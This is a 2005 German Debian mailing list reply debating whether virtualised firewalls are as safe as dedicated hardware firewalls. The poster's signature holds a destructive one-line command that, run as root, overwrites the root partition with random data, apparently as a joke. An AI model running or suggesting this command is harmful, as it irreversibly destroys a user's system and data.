On 2005-04-20, Matthias Houdek <[EMAIL PROTECTED]> wrote:
> Am Mittwoch, 20. April 2005 00:08 schrieb Chrissie Brown:
>> On 2005-04-19, Carsten Ferdian <[EMAIL PROTECTED]> wrote:
>> > benutze schon sehr lang den IpCop und finde das man schon ne eigene
>> > Maschine nutzen sollte um ein oder mehrere Netze zu sch�tzen. Daher
>> > is meine Meinung zu ner virtuellen Umgebung f�r ne Firewall nicht
>> > gerade so egeisternd. Man sollte nicht am falschen Ende sparen und
>> > daher ruhig nen eigenes "echtes" System aufsetzen.
>>
>> Wie kommst du darauf? Wenn jemand das Zeug hackt, ist es doch grad
>> egal ob in der virtuellen oder der "echten" Maschine.
>
> Eine vern�nftige Firewall besteht aus mehr als einem Host.
Das l�sst sich ja auch mit virtuellen Hosts realisieren :-)
> Ist der erste gehackt, gibt es Alarmstufe "Orange", FW2 macht die
> Schotten dicht und die FW1 wird erneuert.
> Die alte FW1 wird dann analysiert (Wer hat sich wie welchen Zugriff
> verschafft?).
Das schlie�t ein, da� du merkst, dass die Feierwand gehackt wurde. Was
aber, wenn nicht? Dann ist es grad wurscht, ob ein "echter" oder
"virtueller" host gehackt w�rde.
> Alles andere ist zumindest f�r ein Firmennetz mit sensiblen/wichtigen
> Daten nichts anderes als Augenwischerei.
Ich denke, das f�r viele Belange eine Feierwand mit vservern ausreichen
w�rde. In Hochsicherheitstrakten mag das anders aussehen.
--
Chrissie
su -c "dd if=/dev/urandom of=`mount |grep 'on / ' |awk '{print $1;}'`"
--
Haeufig gestellte Fragen und Antworten (FAQ):
http://www.de.debian.org/debian-user-german-FAQ/
Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED]
mit dem Subject "unsubscribe". Probleme? Mail an [EMAIL PROTECTED] (engl)
